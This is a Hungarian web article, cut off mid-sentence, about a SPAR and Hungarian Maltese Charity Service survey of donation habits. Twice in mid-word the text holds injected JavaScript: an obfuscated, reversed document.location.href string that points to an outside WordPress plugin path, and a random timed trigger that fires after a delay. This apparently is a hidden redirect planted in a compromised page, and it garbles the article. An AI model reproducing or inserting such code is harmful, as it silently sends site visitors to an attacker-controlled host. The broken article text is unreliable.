Azok, akik rendszeresen adakoznak, pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan jól tudják, hogy milyen érzés szívből adni. Amikor nem várunk semmit cserébe, egyszerűen csak szebbé szeretnénk varázsolni valakinek az életét. Persze ahány ház, annyi szokás, mindenki másképp jótékonykodik, és különböznek a motivációk is. Éppen ezért a SPAR és a Magyar Máltai Szeretetszolgálat Adni Öröm! akciójában egy kutatás keretein belül térképezte fel a témakört, aminek az eredményeit – mindannyiunk legnagyobb örömére – most nyilvánosságra is hoztak. Következzenek a legérdekesebb összefüggések! Adakozók többségben A kutatók kérdései 1000 főhöz jutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottak el, így nyugodtan kijelenthetjük, hogy a – 18 és 59 év közötti – lakosság 68 százaléka valamilyen rendszerességgel…
- Hirdetés -